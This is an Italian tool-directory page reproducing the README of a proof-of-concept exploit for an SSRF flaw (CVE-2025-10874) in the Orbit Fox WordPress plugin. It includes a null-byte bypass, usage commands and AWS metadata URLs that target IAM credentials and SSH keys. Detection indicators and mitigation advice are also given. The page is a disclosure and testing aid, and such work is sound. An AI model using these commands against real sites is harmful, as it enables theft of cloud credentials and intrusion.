Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Orbit-Fox_SSRF_CVE-2025-10874 — Dimostra SSRF con bypass tramite iniezione di byte nullo per CVE-2025-10874 | Kitploit
Strumenti/GitHubGitHub/ryanmroth/orbit-fox_ssrf_cve-2025-10874
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingApprendimento e Formazione
GitHubryanmroth/orbit-fox_ssrf_cve-2025-10874

Orbit-Fox_SSRF_CVE-2025-10874

Dimostra SSRF con bypass tramite iniezione di byte nullo per CVE-2025-10874

Vedi Repository
211 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

alt text

CVE-2025-10874 - Proof of Concept SSRF Orbit Fox

Proof of concept che sfrutta la vulnerabilità Server-Side Request Forgery (SSRF) nel plugin WordPress Orbit Fox con bypass tramite iniezione di byte nulli.

Articolo dettagliato: https://ryanmroth.com/articles/orbit-fox-ssrf

Dettagli della Vulnerabilità

DettaglioNote
ID CVE:CVE-2025-10874
Plugin Interessato:Orbit Fox di ThemeIsle
Tipo di Vulnerabilità:Server-Side Request Forgery (SSRF) (CWE-918)
Punteggio CVSS:5.5 (medio)
Privilegi Richiesti:Autore+ (ruolo Autore WordPress o superiore)
Versione Corretta:3.0.2+

Descrizione

La funzionalità di importazione MyStock del plugin Orbit Fox contiene una vulnerabilità SSRF che consente a utenti autenticati con privilegi Autore+ di effettuare richieste HTTP arbitrarie dal server WordPress. La vulnerabilità risiede nell'azione AJAX handle-request-mystock-import, che non valida né sanifica correttamente i parametri URL.

Lo sfruttamento utilizza un bypass tramite iniezione di byte nulli (%00.txt) per aggirare la validazione dell'URL, consentendo l'accesso a servizi di metadati interni, API di provider cloud e altre risorse di rete raggiungibili dal server.

Scenari di Attacco Comuni

Estrazione Metadati AWS EC2

  • Hostname dell'istanza: http://169.254.169.254/latest/meta-data/hostname
  • Credenziali IAM: http://169.254.169.254/latest/meta-data/iam/security-credentials/
  • Chiavi pubbliche SSH: http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

Installazione

Requisiti

  • Python 3.7+
  • Libreria requests
  • Libreria urllib3

Configurazione

root@kitploit:~
# Clona il repository
git clone <repository-url>
cd Orbit-Fox_SSRF_CVE-2025-10874

# Installa le dipendenze (usando uv)
uv sync

# Oppure usando pip
pip install requests urllib3

Utilizzo

Utilizzo Base

root@kitploit:~
# Estrae l'hostname dell'istanza AWS (target predefinito)
python orbit_fox_poc.py http://target.com -u author -p password123

# Specifica un URL SSRF personalizzato
python orbit_fox_poc.py http://target.com -u author -p password123 \
  -s http://169.254.169.254/latest/meta-data/hostname

Esempi Avanzati

root@kitploit:~
# Estrae le credenziali del ruolo IAM
python orbit_fox_poc.py http://target.com -u author -p password123 \
  -s http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Estrae la chiave pubblica SSH
python orbit_fox_poc.py http://target.com -u author -p password123 \
  -s http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

# Test senza bypass tramite byte nulli (fallirà sulle versioni corrette)
python orbit_fox_poc.py http://target.com -u author -p password123 --no-nullbyte

# Abilita l'output di debug per la risoluzione dei problemi
python orbit_fox_poc.py http://target.com -u author -p password123 --debug

Opzioni della Riga di Comando

root@kitploit:~
argomenti posizionali:
  target                URL WordPress di destinazione (es., http://example.com)

argomenti richiesti:
  -u, --username        Nome utente WordPress (richiesto ruolo Autore+)
  -p, --password        Password WordPress

argomenti opzionali:
  -h, --help            Mostra il messaggio di aiuto ed esci
  -s, --ssrf-url        URL da richiedere tramite SSRF
                        (predefinito: http://169.254.169.254/latest/meta-data/hostname)
  --no-nullbyte         Disabilita il bypass tramite byte nulli (testa solo SSRF di base)
  --debug               Abilita l'output di debug per la risoluzione dei problemi

Come Funziona

  1. Autenticazione: Autentica a WordPress usando le credenziali fornite
  2. Recupero Nonce: Estrae il nonce di sicurezza dal pannello di amministrazione WordPress
  3. Iniezione di Byte Nulli: Aggiunge %00.txt all'URL di destinazione per aggirare la validazione
  4. Esecuzione SSRF: Invia una richiesta appositamente costruita all'endpoint AJAX handle-request-mystock-import
  5. Recupero Contenuto: Recupera e visualizza il contenuto ottenuto dalla libreria media di WordPress

Rilevamento

Indicatori nei Log

  • Richieste HTTP in uscita anomale verso servizi di metadati (169.254.169.254)
  • Richieste a admin-ajax.php con azione handle-request-mystock-import
  • Upload nella libreria media WordPress da URL interni/di metadati

Mitigazione

  • Aggiorna Orbit Fox alla versione 3.0.2 o successiva
  • Implementa un filtraggio egress rigoroso sul server WordPress
  • Monitora e limita l'accesso agli endpoint di metadati cloud
  • Rivedi i ruoli utente e limita i privilegi Autore+

Divulgazione Responsabile

Questa vulnerabilità è stata divulgata responsabilmente al fornitore ed è stata corretta nella versione 3.0.2 di Orbit Fox. Questo proof of concept è fornito per:

  • Ricerca e test di sicurezza
  • Valutazione delle vulnerabilità di sistemi autorizzati
  • Scopi educativi

Disclaimer Legale

SOLO PER TEST DI SICUREZZA AUTORIZZATI

Questo strumento è fornito esclusivamente per scopi educativi e di test di sicurezza autorizzati. L'accesso non autorizzato a sistemi informatici è illegale. Gli utenti devono:

  • Ottenere esplicita autorizzazione scritta prima di effettuare test
  • Utilizzarlo solo su sistemi di cui si è proprietari o per cui si è autorizzati a testare
  • Conformarsi a tutte le leggi e i regolamenti applicabili

L'autore non si assume alcuna responsabilità per l'uso improprio di questo strumento.

Riferimenti

  • Vulnerabilità Originale Alex Sanford – CVE-2023-2287
  • Dettagli CVE: CVE-2025-10874
  • Repository del Plugin: Orbit Fox di ThemeIsle
  • Servizio Metadati AWS: Instance Metadata Service

Ultimo Aggiornamento: 2025-10-06

Scarica lo strumento